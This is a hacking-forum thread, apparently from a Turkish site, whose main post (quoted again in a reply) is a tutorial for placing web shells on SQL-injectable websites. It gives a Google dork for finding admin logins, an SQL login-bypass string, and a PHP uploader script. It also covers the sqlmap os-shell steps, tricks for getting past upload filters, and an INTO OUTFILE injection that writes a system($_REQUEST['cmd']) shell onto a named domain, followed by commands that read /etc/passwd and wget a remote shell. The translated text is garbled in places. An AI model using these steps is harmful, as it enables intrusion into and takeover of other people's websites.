Uploading Shells to SQL Vulnerable Sites

SkyRest

Katılımcı Üye
15 May 2016
400
241
25
MEDUSA

a3b2jeo.png

szdpxie.jpg

Greetings to all of you, in this topic, I will show you how we can shell the target site with SQL vulnerability. First of all, there are several methods of uploading shells. You can use any method you want. Or if not, you can shell it using the other method.

But to shell, we need the admin information and panel of our target site. Exploiting the SQL vulnerability, getting admin information, finding panels, etc. we've already told you about this with the previous extensive and detailed description.


We get the first data with Manual SQL, and then we can find the panel and shell it out. I'll also show you the admin panel bypass method for those that hang on the Admin panel. Or we could use the SQLMap tool to upload it. Of course, in both ways, separate powers may be required.
h7fao2l.png

Method 1

Let's get a target site first.
I Google it and search for "inurl:admin/login.php ".
I've got a lot of sites coming up.
hs1m6kf.jpg

I choose any of these sites.

It's already going to direct us to the admin panel. But we don't know admin information. That's the point.

ft46wn2.jpg



I write the same code on the username and password. That's our bypass code. These codes can vary, which you don't have to use.
''or'='or''
After we write our code, I call it login.
6ayrbhp.jpg

After we press login, we logged into the admin panel. Since this is a file download button, we can download and discard our shell from here.
I uploaded out my shell, but he didn't agree to it. What should I do? if you say so, he has an easy way.

Try their code, which is .txt, not .php. This is usually a high probability on wordpress sites. Or by changing its extension.gif, .jpeg, etc. you can do it.

Or try installing a simple uploader script, and then try uploading your shell file with this upload script you uploaded. An example upload script code is below.
mlr9qrn.jpg

<!DOCTYPE html>
<html>
<head>
<title>Upload your files</title>
</head>
<bOdy>
<form enctype="multipart/form-data" action="upload.php" method="POST">
<p>Upload your file</p>
<input type="file" name="uploaded_file"></input><br />
<input type="submit" value="Upload"></input>
</form>
</bOdy>
</html>
<?PHP
if(!empty($_FILES[’uploaded_file’]))
{
$path = "uploads/";
$path = $path . basename( $_FILES[’uploaded_file’][’name’]);
if(move_uploaded_file($_FILES[’uploaded_file’][’tmp_name’], $path)) {
echo "The file ". basename( $_FILES[’uploaded_file’][’name’]).
" has been uploaded";
} else{
echo "There was an error uploading the file, please try again!";
}
}
?>
We can upload our Upload script and upload our shell. That way we can get past the firewall. This will be accepted because there is nothing harmful in our script. This can inject malware, including shells.
h7fao2l.png

9elnh0i.jpg

Method 2
One of the tools to help us shell our target site is the SQLMap tool. With this tool, we can pull databases, access admin information, and shell them.
At first, we found an sql-sob site, and we want to put a shell in this pathetic site. First, we took advantage of the SQL Injection vulnerability on our site and
entered Databasia with the Sqlmap.
rnebdod.jpg

And then we'll -- we'll delete the dbs part and write the os-shell command.
941odki.jpg

We have a 4 option question.

Which web application language does the web server support?

[1] ASP
[2] ASPX

[3] JSP
[4] PHP (default)
g263xen.jpg

In short, this website says which Language is encoded, because our site is encoded with php, I select PHP, option 4, which may vary the language of the site's software when you apply this process to another site.

As you can see, he tried one by one and Shelli Upload.

1jc8drs.jpg


When we click on the link we were given, it sends us to the shell loading screen. We can upload shells from here. We don't see an error like not being able to upload, because this is the upload script that we upload with our sqlmap tool, not the site. Therefore, the shell or malware can be injected smoothly.

Screenshot;
cbfwasl.jpg

And then he said to us,

do you want to print out the command standard?
i mean,
do you want the command standard output?

kind of. Let's go with the Y-shaped. Don't upload it to us
r3z25go.jpg

We can upload our shelll to any directory we want. We can run our shells smoothly.
The shell image we uploaded;
love6m2.jpg


This method is most likely to work on http sites, usually protection, etc. it is not found and can be easily shell-shocked, it is unlikely. HTTPS can also be tried for sites, but there is also a chance that our tool may fail because it tries hard methods.

So it's always better to shoot manually. But this method can also be used.
h7fao2l.png

Method 3

Another method of loading bypass and shell is, let's say, we've entered the admin panel of our target site, but shell is not allowed or blocked. We tried the Shell codes or changed the extension, but it still wasn't accepted.




Then you can try the firebug plug-in;



The Firebug plug-in is a convenient and convenient plug-in that helps us to thoroughly review the target site in the burp suite or the kali linux, whatever the Firebug plug-in is, and, if necessary, allows us to upload files by playing with their code.



In some cases, client-side security filters work instead of server-side security, where you install shell. If this happens, download and install the Firebug plug-in for Mozilla and edit the upload html file as follows.
<form enctype=\\"multipart/form-data\\" action=\\"uploader.php\\" method=\\"POST\\"> Upload DRP File: <input name=\\"Upload Saved Replay\\" type=\\"file\\" accept=\\"*.jpg\\"/><br /> <input type=\\"submit\\" value=\\"Upload File\\" /> </form>


isevi98.jpg

accept=\"*.jpg\\section to accept in this section=\"*. *\\\\\\\\\\\ it changes to so you can skip the plug-in control and load your shell.
Click to download and install the Firebug Plugin and use it

a3b2jeo.png


Method 4

in our 4th shell installation method, we can trick the server into image format and upload it as a picture.

For this,
Sometimes, when bypassing the data, Mozilla’s Tamper plug-in is also used. To do this, install the buffer data add-in from the store. The Tamper plug-in is an add-in that allows us to upload files.

then go to the site you want to shell and run the start buffer add-in.

upload your shell later. Then continue by pressing the next buffer button on the Continue screen.


from the incoming screen, find the application/octet-stream part of the data in the post data section and change it to image/gif or image/jpg, then click submit button to continue so that you can upload your shell to the server, such as a picture file.


The Tamper plug-in also has versions for different browsers, such as chrome, so you can download and use them.

You can also visit this link;


Click here to learn more about Tamper Data

Method 5
5. and in our final method, we'll see if our sql sob site has authorizing writing, and if so, we'll upload our shell.

Let's find any SQL-sob site and try it.
z20pnY.png




After we find our site, let's find the number of columns and print them on the screen.


Gp9432.png

Let's get the DB name as the next step.

yA0pVL.png


We found out THE NAME DB is mattat_mattat. Now let's look at our DB user.
6lJvmP.png

We have printed on OUR DB base, mattat_mattat@localhost. We got the information on the database.

We'll now use the file_ate command. And what does that mean?

file_i.are the commands we use to read and write files on the server.

I mean, like this.
mattat.co. il/show_img.php?id=-27+union+select+1, file_\nwhere mysql.user='mattat_mattat'-
W67pbY.png


after we write our command, we need to find the directory, 'we saw our directory when we put the sign 'we saw the directory.

/home/mattat/public_html/show_img.php


after the array is found, we write this command;
http://www.mattat.co.il/show_img.php?id=-27+union+select+1,

"<?system($_REQUEST['cmd']);?>"
into outfile '/home/mattat/public_html/show_img.php--


this is the important part. we'll know if we're successful.

let's do an interrogation by typing one of these commands:


mattat.co.il/show_img.php?id=cat /etc/passwd

mattat.co.il/show_img.php?id=cat /named.conf

mattat.co.il/show_img.php?id=cat /httpd/httpd.conf

RbnpQ1.png



this is the important part. we'll know if we're successful.

let's do an interrogation by typing one of these commands:

mattat.co.il/show_img.php?id=wget -Ohttp://xn--shell-write-your site-x5c/up.txt cw.php



find a shell site and write down that address. we're going to pull and print the desired shelled auto off the site.


we have our shelters' name written in cw.php.

let's go to the address;
pm6NE0.png




as it turns out, our shell upload was successful.





in addition, our commands are to help;


Select_priv : Read records

Insert_ate: Add a record

Update_of: Change/update records

Delete_priv: Delete a record

Create_sc: Creating a database/table

Drop_priv: Remove database/table

Reload_ate: MySQLi restart

Shutdown_ate: MySQLi shutdown

Process_ate: Follow MySQLde Employee processes

File_ate: Read/write files from the server

Grant_priv:Entitlement other users

Index_what: Create, modify, delete an index

Alter_ate: Change the structure of the table or database

Show_db_bit: Database listing

Lock_tables_Loc:Table locking




Max_questions: The number of enquiries that can be carried out within the hour

Max_updates: The maximum number of update queries that can be performed within an hour
Max_connections: Maximum number of connections within one hour


af8mqjc.gif


thanks for reading, remember to like it




For the Turkish version





ezaacht.png
iUBacd.gif
px19hzz.png


"those who don't care about us are just potential enemies"
 
Moderatör tarafında düzenlendi:

AwiR

Katılımcı Üye
4 Ocak 2020
503
211

a3b2jeo.png

szdpxie.jpg

Greetings to all of you, in this topic, I will show you how we can shell the target site with SQL vulnerability. First of all, there are several methods of uploading shells. You can use any method you want. Or if not, you can shell it using the other method.

But to shell, we need the admin information and panel of our target site. Exploiting the SQL vulnerability, getting admin information, finding panels, etc. we've already told you about this with the previous extensive and detailed description.


We get the first data with Manual SQL, and then we can find the panel and shell it out. I'll also show you the admin panel bypass method for those that hang on the Admin panel. Or we could use the SQLMap tool to upload it. Of course, in both ways, separate powers may be required.
h7fao2l.png

Method 1

Let's get a target site first.
I Google it and search for "inurl:admin/login.php ".
I've got a lot of sites coming up.
hs1m6kf.jpg

I choose any of these sites.

It's already going to direct us to the admin panel. But we don't know admin information. That's the point.

ft46wn2.jpg



I write the same code on the username and password. That's our bypass code. These codes can vary, which you don't have to use.
''or'='or''
After we write our code, I call it login.
6ayrbhp.jpg

After we press login, we logged into the admin panel. Since this is a file download button, we can download and discard our shell from here.
I uploaded out my shell, but he didn't agree to it. What should I do? if you say so, he has an easy way.

Try their code, which is .txt, not .php. This is usually a high probability on wordpress sites. Or by changing its extension.gif, .jpeg, etc. you can do it.

Or try installing a simple uploader script, and then try uploading your shell file with this upload script you uploaded. An example upload script code is below.
mlr9qrn.jpg



We can upload our Upload script and upload our shell. That way we can get past the firewall. This will be accepted because there is nothing harmful in our script. This can inject malware, including shells.
h7fao2l.png

9elnh0i.jpg

Method 2
One of the tools to help us shell our target site is the SQLMap tool. With this tool, we can pull databases, access admin information, and shell them.
At first, we found an sql-sob site, and we want to put a shell in this pathetic site. First, we took advantage of the SQL Injection vulnerability on our site and
entered Databasia with the Sqlmap.
rnebdod.jpg

And then we'll -- we'll delete the dbs part and write the os-shell command.
941odki.jpg

We have a 4 option question.

Which web application language does the web server support?

[1] ASP
[2] ASPX

[3] JSP
[4] PHP (default)
g263xen.jpg

In short, this website says which Language is encoded, because our site is encoded with php, I select PHP, option 4, which may vary the language of the site's software when you apply this process to another site.

As you can see, he tried one by one and Shelli Upload.

1jc8drs.jpg


When we click on the link we were given, it sends us to the shell loading screen. We can upload shells from here. We don't see an error like not being able to upload, because this is the upload script that we upload with our sqlmap tool, not the site. Therefore, the shell or malware can be injected smoothly.

Screenshot;
cbfwasl.jpg

And then he said to us,

do you want to print out the command standard?
i mean,
do you want the command standard output?

kind of. Let's go with the Y-shaped. Don't upload it to us
r3z25go.jpg

We can upload our shelll to any directory we want. We can run our shells smoothly.
The shell image we uploaded;
love6m2.jpg


This method is most likely to work on http sites, usually protection, etc. it is not found and can be easily shell-shocked, it is unlikely. HTTPS can also be tried for sites, but there is also a chance that our tool may fail because it tries hard methods.

So it's always better to shoot manually. But this method can also be used.
h7fao2l.png

Method 3

Another method of loading bypass and shell is, let's say, we've entered the admin panel of our target site, but shell is not allowed or blocked. We tried the Shell codes or changed the extension, but it still wasn't accepted.




Then you can try the firebug plug-in;



The Firebug plug-in is a convenient and convenient plug-in that helps us to thoroughly review the target site in the burp suite or the kali linux, whatever the Firebug plug-in is, and, if necessary, allows us to upload files by playing with their code.



In some cases, client-side security filters work instead of server-side security, where you install shell. If this happens, download and install the Firebug plug-in for Mozilla and edit the upload html file as follows.




isevi98.jpg

accept=\"*.jpg\\section to accept in this section=\"*. *\\\\\\\\\\\ it changes to so you can skip the plug-in control and load your shell.
Click to download and install the Firebug Plugin and use it

a3b2jeo.png


Method 4

in our 4th shell installation method, we can trick the server into image format and upload it as a picture.

For this,
Sometimes, when bypassing the data, Mozilla’s Tamper plug-in is also used. To do this, install the buffer data add-in from the store. The Tamper plug-in is an add-in that allows us to upload files.

then go to the site you want to shell and run the start buffer add-in.

upload your shell later. Then continue by pressing the next buffer button on the Continue screen.


from the incoming screen, find the application/octet-stream part of the data in the post data section and change it to image/gif or image/jpg, then click submit button to continue so that you can upload your shell to the server, such as a picture file.


The Tamper plug-in also has versions for different browsers, such as chrome, so you can download and use them.

You can also visit this link;


Click here to learn more about Tamper Data

Method 5
5. and in our final method, we'll see if our sql sob site has authorizing writing, and if so, we'll upload our shell.

Let's find any SQL-sob site and try it.
z20pnY.png




After we find our site, let's find the number of columns and print them on the screen.


Gp9432.png

Let's get the DB name as the next step.

yA0pVL.png


We found out THE NAME DB is mattat_mattat. Now let's look at our DB user.
6lJvmP.png

We have printed on OUR DB base, mattat_mattat@localhost. We got the information on the database.

We'll now use the file_ate command. And what does that mean?

file_i.are the commands we use to read and write files on the server.

I mean, like this.
mattat.co. il/show_img.php?id=-27+union+select+1, file_\nwhere mysql.user='mattat_mattat'-
W67pbY.png


after we write our command, we need to find the directory, 'we saw our directory when we put the sign 'we saw the directory.

/home/mattat/public_html/show_img.php


after the array is found, we write this command;
http://www.mattat.co.il/show_img.php?id=-27+union+select+1,

"<?system($_REQUEST['cmd']);?>"
into outfile '/home/mattat/public_html/show_img.php--


this is the important part. we'll know if we're successful.

let's do an interrogation by typing one of these commands:


mattat.co.il/show_img.php?id=cat /etc/passwd

mattat.co.il/show_img.php?id=cat /named.conf

mattat.co.il/show_img.php?id=cat /httpd/httpd.conf

RbnpQ1.png



this is the important part. we'll know if we're successful.

let's do an interrogation by typing one of these commands:

mattat.co.il/show_img.php?id=wget -Ohttp://xn--shell-write-your site-x5c/up.txt cw.php



find a shell site and write down that address. we're going to pull and print the desired shelled auto off the site.


we have our shelters' name written in cw.php.

let's go to the address;
pm6NE0.png




as it turns out, our shell upload was successful.





in addition, our commands are to help;


Select_priv : Read records

Insert_ate: Add a record

Update_of: Change/update records

Delete_priv: Delete a record

Create_sc: Creating a database/table

Drop_priv: Remove database/table

Reload_ate: MySQLi restart

Shutdown_ate: MySQLi shutdown

Process_ate: Follow MySQLde Employee processes

File_ate: Read/write files from the server

Grant_priv:Entitlement other users

Index_what: Create, modify, delete an index

Alter_ate: Change the structure of the table or database

Show_db_bit: Database listing

Lock_tables_Loc:Table locking




Max_questions: The number of enquiries that can be carried out within the hour

Max_updates: The maximum number of update queries that can be performed within an hour
Max_connections: Maximum number of connections within one hour


af8mqjc.gif


thanks for reading, remember to like it




For the Turkish version





ezaacht.png
iUBacd.gif
px19hzz.png


"those who don't care about us are just potential enemies"
nice topic.
 

babakmoney

Yeni üye
3 Mar 2023
5
0
Error! You should provide District Name. none is opening here

if there any software attached to it?
 
Moderatör tarafında düzenlendi:
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.